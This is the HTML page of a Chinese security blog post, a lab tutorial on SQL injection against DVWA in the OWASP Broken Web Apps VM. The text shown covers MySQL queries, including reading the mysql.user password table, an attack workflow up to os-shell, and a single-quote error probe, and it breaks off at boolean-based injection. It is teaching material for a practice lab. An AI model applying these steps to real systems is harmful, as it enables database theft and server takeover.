<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">








<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">



  <meta name="google-site-verification" content="ZsntNucQnwgOG8NJsPVjhDxi8hx9YmTvgqa9eReuux0">



  <meta name="msvalidate.01" content="A3C088EA1884107284C9F5B94B1C667F">






  <meta name="baidu-site-verification" content="rLNDlRl5mo">







  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/avatar.jpg?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/avatar.jpg?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/avatar.jpg?v=5.1.4">


  <link rel="mask-icon" href="/images/avatar.jpg?v=5.1.4" color="#222">





  <meta name="keywords" content="Web,SQL注入,安全,">










<meta name="description" content="123456在owasp年度top 10 安全问题中，注入高居榜首。SQL注入攻击指的是通过构建特殊的输入作为参数传入web应用程序，而在这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用户输入的数据，致使非法数据侵入系统。- 对于web应用程序而言，用户核心数据存储在数据中，例如MySQL、SQL Server、Oracle、MSS">
<meta name="keywords" content="Web,SQL注入,安全">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入攻击及防御">
<meta property="og:url" content="https://axiaowei.cn/2019/06/19/201942/index.html">
<meta property="og:site_name" content="小维的博客">
<meta property="og:description" content="123456在owasp年度top 10 安全问题中，注入高居榜首。SQL注入攻击指的是通过构建特殊的输入作为参数传入web应用程序，而在这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用户输入的数据，致使非法数据侵入系统。- 对于web应用程序而言，用户核心数据存储在数据中，例如MySQL、SQL Server、Oracle、MSS">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24p1zqijfj30s80ictaq.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24p7d1kdkj30qf0353yv.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24pb39aqqj30ft03b74d.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24pda5j5bj30c8039gm7.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24pdvjdkxj30ew03bmxa.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24ph4remej30fm03y74h.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24pl9vfqfj30ek03mglh.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24psf8qpjj30nu0ao772.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24pycj5ouj30g705o402.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24q024yv7j30qz058myy.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24q98gjm0j30pt0fc79x.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24qd4c5m6j30rs0i946b.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24qg0i151j30ho0edgn6.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24qltqsb6j30s80jkwj5.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24rfs5dd1j30s80de78g.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24qmc5vxfj30g10hbgom.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24qpl5986j30is03iq3b.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24rwerwlgj30ue0acdgc.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007JdRFxgy1g24jc34svgj30ws0k2ab4.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24s0ij98kj30v30bewf3.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24s8lpkc7j30ve084jrs.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/007JdRFxgy1g24jeovndzj30vq0l9my7.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24jrt7gqtj30xd0jjdgr.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24jrt4xjnj30w50jiwfe.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24tdklru9j30vm0i00ue.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24tvbpudnj30vd0f7my9.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25bqsn9fvj30rr0ddgoo.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25cyoljcxj30un0epaaw.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25d0cage8j30rs072js9.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25daoirc3j30uq0d4aap.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25dmryxvfj30v50e975c.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25dnm8i6xj30k701pmxi.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25ethc1rcj30rv0frdrk.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25kg8fgyqj30tf0i4aol.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25kj5bpwej30th0hxamm.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25mx782w3j30th0f6dtt.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25mxvijnsj30ti0hm7ii.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25n9d7ofbj30tf0hpk4i.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25ngjb91zj30tl0g7nab.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25nkfofgcj30tv0ig4bd.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25nxhxcwoj30uf0huq3t.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25obzulzrj30tg0hjk54.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25oi5fstlj30tv0ifdty.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25oidom5uj30tv0ifws3.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25ok1ch2wj30tv0ifgyr.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25ollds54j30tv0ifqi1.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25q8opahoj30tv0ifk5s.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25q92uqw7j30tv0ifwto.jpg">
<meta property="og:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g25q97np26j30tv0if7k8.jpg">
<meta property="og:updated_time" content="2019-06-19T02:56:00.102Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL注入攻击及防御">
<meta name="twitter:description" content="123456在owasp年度top 10 安全问题中，注入高居榜首。SQL注入攻击指的是通过构建特殊的输入作为参数传入web应用程序，而在这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用户输入的数据，致使非法数据侵入系统。- 对于web应用程序而言，用户核心数据存储在数据中，例如MySQL、SQL Server、Oracle、MSS">
<meta name="twitter:image" content="https://ws1.sinaimg.cn/large/007JdRFxgy1g24p1zqijfj30s80ictaq.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":10,"b2t":true,"scrollpercent":true,"onmobile":true},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://axiaowei.cn/2019/06/19/201942/">





  <title>SQL注入攻击及防御 | 小维的博客</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">小维的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Python | CTF | Writeup | Note | 安全 关于图片无法加载问题，需科学上网才可以正常加载，近期会全部更换为云存储或者本地存储</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://axiaowei.cn/2019/06/19/201942/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="小维同学">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/uploads/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="小维的博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQL注入攻击及防御</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-06-19T10:37:50+08:00">
                2019-06-19
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/笔记/" itemprop="url" rel="index">
                    <span itemprop="name">笔记</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  3,479字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  16分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">在owasp年度top 10 安全问题中，注入高居榜首。SQL注入攻击指的是通过构建特殊的输入作为参数传入web应用程序，而在这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用户输入的数据，致使非法数据侵入系统。</span><br><span class="line"></span><br><span class="line"><span class="bullet">- </span>对于web应用程序而言，用户核心数据存储在数据中，例如MySQL、SQL Server、Oracle、MSSQL等</span><br><span class="line"><span class="bullet">- </span>通过SQL注入攻击，可以获取、修改、删除数据库信息，并且通过提权来控制web服务器等其他操作</span><br><span class="line"><span class="bullet">- </span>SQL注入即攻击者通过构造特殊的SQL语句，入侵目标系统，致使后台数据库泄露数据的过程</span><br><span class="line"><span class="bullet">- </span>因为SQL注入漏洞造成的严重危害性，所以常年稳居 OWASP TOP10的榜首！</span><br></pre></td></tr></table></figure>
<a id="more"></a>
<h4 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h4><figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">目标靶机<span class="selector-pseudo">:OWASP_Broken_Web_Apps_VM_1.2</span></span><br><span class="line"><span class="selector-tag">IP</span>：192<span class="selector-class">.168</span><span class="selector-class">.203</span><span class="selector-class">.22</span></span><br></pre></td></tr></table></figure>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">测试渗透机：kali-linux<span class="number">-2018</span><span class="number">-4</span>-vm-amd64</span><br><span class="line">IP：<span class="number">192.168</span><span class="number">.203</span><span class="number">.19</span></span><br></pre></td></tr></table></figure>
<h4 id="SQL注入危害"><a href="#SQL注入危害" class="headerlink" title="SQL注入危害"></a>SQL注入危害</h4><ul>
<li>拖库导致用户数据泄露</li>
<li>危害web等应用的安全</li>
<li>失去操作系统的控制权</li>
<li>用户信息被非法买卖</li>
<li>危害企业及国家的安全</li>
</ul>
<h4 id="SQL基础-查"><a href="#SQL基础-查" class="headerlink" title="SQL基础(查)"></a>SQL基础(查)</h4><h5 id="查看数据库"><a href="#查看数据库" class="headerlink" title="查看数据库"></a>查看数据库</h5><figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; <span class="keyword">SHOW </span>DATABASES<span class="comment">;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24p1zqijfj30s80ictaq.jpg" alt=""></p>
<h5 id="查看数据库版本"><a href="#查看数据库版本" class="headerlink" title="查看数据库版本"></a>查看数据库版本</h5><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; <span class="keyword">SELECT</span> VERSION();</span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24p7d1kdkj30qf0353yv.jpg" alt=""></p>
<h5 id="查看当前库"><a href="#查看当前库" class="headerlink" title="查看当前库"></a>查看当前库</h5><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; <span class="keyword">SELECT</span> <span class="keyword">DATABASE</span>();</span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24pb39aqqj30ft03b74d.jpg" alt=""></p>
<h5 id="查看当前用户"><a href="#查看当前用户" class="headerlink" title="查看当前用户"></a>查看当前用户</h5><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; <span class="keyword">SELECT</span> <span class="keyword">USER</span>();</span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24pda5j5bj30c8039gm7.jpg" alt=""></p>
<h5 id="查看当前时间"><a href="#查看当前时间" class="headerlink" title="查看当前时间"></a>查看当前时间</h5><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; <span class="keyword">SELECT</span> NOW();</span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24pdvjdkxj30ew03bmxa.jpg" alt=""></p>
<h5 id="选择数据库"><a href="#选择数据库" class="headerlink" title="选择数据库"></a>选择数据库</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; <span class="keyword">USE</span> <span class="title">dvwa</span>; </span><br><span class="line"><span class="comment">//dvwa为你要选择的数据库名</span></span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24ph4remej30fm03y74h.jpg" alt=""></p>
<h5 id="查看库中的表"><a href="#查看库中的表" class="headerlink" title="查看库中的表"></a>查看库中的表</h5><figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; <span class="keyword">SHOW </span>TABLES<span class="comment">;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24pl9vfqfj30ek03mglh.jpg" alt=""></p>
<h5 id="查看表结构"><a href="#查看表结构" class="headerlink" title="查看表结构"></a>查看表结构</h5><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; DESCRIBE users;</span><br><span class="line">或</span><br><span class="line">mysql&gt; DESC users;</span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24psf8qpjj30nu0ao772.jpg" alt=""></p>
<h5 id="查看表的详细属性"><a href="#查看表的详细属性" class="headerlink" title="查看表的详细属性"></a>查看表的详细属性</h5><figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; SHOW CREATE <span class="keyword">TABLE</span> USERS\G</span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24pycj5ouj30g705o402.jpg" alt=""></p>
<h5 id="查看表记录"><a href="#查看表记录" class="headerlink" title="查看表记录"></a>查看表记录</h5><figure class="highlight oxygene"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; <span class="keyword">SELECT</span> * <span class="keyword">FROM</span> USERS;</span><br><span class="line"><span class="comment">// * 代表所有字段（可以指定字段）</span></span><br><span class="line"><span class="comment">// USERS代表要查询表</span></span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24q024yv7j30qz058myy.jpg" alt=""><br><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">其他库 mysql.user</span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> <span class="keyword">user</span>,<span class="keyword">password</span>,host <span class="keyword">FROM</span> mysql.<span class="keyword">user</span> ;</span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24q98gjm0j30pt0fc79x.jpg" alt=""><br><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">WHERE条件查询 </span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> <span class="keyword">user</span>,<span class="keyword">password</span>,host <span class="keyword">FROM</span> mysql.<span class="keyword">user</span> <span class="keyword">WHERE</span> <span class="keyword">user</span>=<span class="string">'root'</span>;</span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> <span class="keyword">user</span>,<span class="keyword">password</span>,host <span class="keyword">FROM</span> mysql.<span class="keyword">user</span> <span class="keyword">WHERE</span> <span class="keyword">user</span>=<span class="string">'root'</span> <span class="keyword">and</span> host=<span class="string">'localhost'</span>;</span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> <span class="keyword">user</span>,<span class="keyword">password</span>,host <span class="keyword">FROM</span> mysql.<span class="keyword">user</span> <span class="keyword">WHERE</span> <span class="keyword">user</span>=<span class="string">'root'</span> <span class="keyword">or</span>  host=<span class="string">'localhost'</span>;</span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24qd4c5m6j30rs0i946b.jpg" alt=""></p>
<h5 id="infomation-schema表"><a href="#infomation-schema表" class="headerlink" title="infomation_schema表"></a>infomation_schema表</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">INFORMATION_SCHEMA提供了访问数据库元数据的方式。</span><br><span class="line"></span><br><span class="line">元数据是关于数据的数据，如数据库名或表名，列的数据类型，或访问权限等。有些时候用于表述该信息的其他术语包括“数据词典”和“系统目录”。</span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24qg0i151j30ho0edgn6.jpg" alt=""><br><figure class="highlight oxygene"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//查看数据库库名、表名</span></span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> * <span class="keyword">FROM</span> information_schema.TABLES\G</span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24qltqsb6j30s80jkwj5.jpg" alt=""><br><figure class="highlight oxygene"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//查看数据库库名、表名、字段名</span></span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> * <span class="keyword">FROM</span> information_schema.columns\G</span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24rfs5dd1j30s80de78g.jpg" alt=""><br><figure class="highlight oxygene"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; <span class="keyword">SELECT</span> <span class="keyword">DISTINCT</span> TABLE_SCHEMA <span class="keyword">FROM</span> information_schema.TABLES;</span><br><span class="line"><span class="comment">//DISTINCT 去重</span></span><br><span class="line"><span class="comment">//等同于 SHOW DATABASES;</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24qmc5vxfj30g10hbgom.jpg" alt=""><br><figure class="highlight oxygene"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; <span class="keyword">SELECT</span> TABLE_NAME <span class="keyword">FROM</span> information_schema.TABLES <span class="keyword">WHERE</span> TABLE_SCHEMA=<span class="string">'dvwa'</span>;</span><br><span class="line"><span class="comment">//等同于 SHOW TABLES;</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24qpl5986j30is03iq3b.jpg" alt=""></p>
<h4 id="SQL注入流程"><a href="#SQL注入流程" class="headerlink" title="SQL注入流程"></a>SQL注入流程</h4><ul>
<li>判断是否存在SQL注入漏洞</li>
<li>判断操作系统、数据库和web应用的类型</li>
<li>获取数据库信息，包括管理员信息以及拖库</li>
<li>加密信息破解，sqlmap可自动破解</li>
<li>提升权限，获得sql-shell、os-shell、登录应用后台</li>
</ul>
<h4 id="手动注入实战（基础）"><a href="#手动注入实战（基础）" class="headerlink" title="手动注入实战（基础）"></a>手动注入实战（基础）</h4><h5 id="基于错误的注入"><a href="#基于错误的注入" class="headerlink" title="基于错误的注入"></a>基于错误的注入</h5><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">错误注入的思路是通过构造特殊的SQL语句，根据得到的错误信息，确认SQL注入点；</span><br><span class="line">通过数据库报错信息，也可以探测到数据库的类型和其他有用信息<span class="comment">;</span></span><br><span class="line">通过输入单引号，触发数据库异常，通过异常日志诊断数据库类型<span class="comment">;</span></span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24rwerwlgj30ue0acdgc.jpg" alt=""><br>从查看源代码文件<br>在低安全模式下，没有做安全过滤：<br>直接将获取到的值代入数据库语句<br><img src="http://ww1.sinaimg.cn/large/007JdRFxgy1g24jc34svgj30ws0k2ab4.jpg" alt=""><br>当前所使用的库为dvwa<br>搜索框正常输入1<br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24s0ij98kj30v30bewf3.jpg" alt=""><br><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">生成的sql语句：</span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">where</span> user_id=<span class="string">'1'</span>;</span><br></pre></td></tr></table></figure></p>
<p>搜索框输入单引号’，报出语法错误<br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g24s8lpkc7j30ve084jrs.jpg" alt=""><br>说明了它能够接受单引号(没有过滤)，只是试探性的试试看是否存在注入点<br><figure class="highlight vbnet"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">生成的sql语句：</span><br><span class="line">mysql&gt; <span class="keyword">SELECT</span> first_name,last_name <span class="keyword">FROM</span> dvwa.users <span class="keyword">where</span> user_id=<span class="comment"><span class="doctag">'''</span>;</span></span><br></pre></td></tr></table></figure></p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">页面报错</span><br><span class="line">You have <span class="keyword">an</span> error <span class="keyword">in</span> your SQL syntax; check <span class="keyword">the</span> manual that corresponds <span class="built_in">to</span> your MySQL server <span class="built_in">version</span> <span class="keyword">for</span> <span class="keyword">the</span> <span class="literal">right</span> syntax <span class="built_in">to</span> use near <span class="string">''</span><span class="string">''</span><span class="string">' at line 1</span></span><br></pre></td></tr></table></figure>
<h5 id="基于布尔的注入"><a href="#基于布尔的注入" class="headerlink" title="基于布尔的注入"></a>基于布尔的注入</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">布尔逻辑注入的思路是闭合SQL语句、构造<span class="keyword">or</span>和<span class="keyword">and</span>逻辑语句、注释多余的代码；</span><br></pre></td></tr></table></figure>
